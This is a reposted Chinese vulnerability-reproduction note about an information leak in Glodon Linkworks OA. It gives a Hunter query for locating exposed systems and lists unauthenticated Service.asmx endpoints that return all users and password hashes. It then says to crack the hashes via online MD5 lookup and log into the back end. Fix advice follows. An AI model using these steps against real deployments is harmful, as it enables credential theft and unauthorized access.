已解决
广联达OA存在信息泄露漏洞复现
来自网友在路上 185885提问 提问时间:2023-11-06 17:23:57阅读次数: 85
最佳答案 问答题库858位专家为你答疑解惑
文章目录
- 广联达OA存在信息泄露漏洞复现
- 0x01 前言
- 0x02 漏洞描述
- 0x03 影响版本
- 0x04 漏洞环境
- 0x05 漏洞复现
- 1.访问漏洞环境
- 2.复现
- 0x06 修复建议
广联达OA存在信息泄露漏洞复现
0x01 前言
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
0x02 漏洞描述
广联达 Linkworks办公OA存在信息泄露,攻击者可通过此漏洞获取账户密码登录后台,从而造成不良影响。
0x03 影响版本
广联达 Linkworks办公OA
0x04 漏洞环境
hunter语法: web.body=“/Services/Identification/Server/”
0x05 漏洞复现
1.访问漏洞环境
2.复现
1.隐患url
/Org/service/Service.asmx
2.查看所有用户
/Org/service/Service.asmx/GetAllUsersXml
3.查看所有工程
/Org/service/Service.asmx/GetDeptXml4GEPS
4.查看账户密码
/Org/service/Service.asmx/GetUserXml4GEPS
使用MD5在线解密,解密后登录界面如下
0x06 修复建议
1、禁用泄露敏感信息的页面或应用。
2、升级到安全版本
查看全文
99%的人还看了
猜你感兴趣
版权申明
本文"广联达OA存在信息泄露漏洞复现":http://eshow365.cn/6-33796-0.html 内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!
- 上一篇: Linux小技巧之文件差异对比
- 下一篇: 如何用思维导图拆书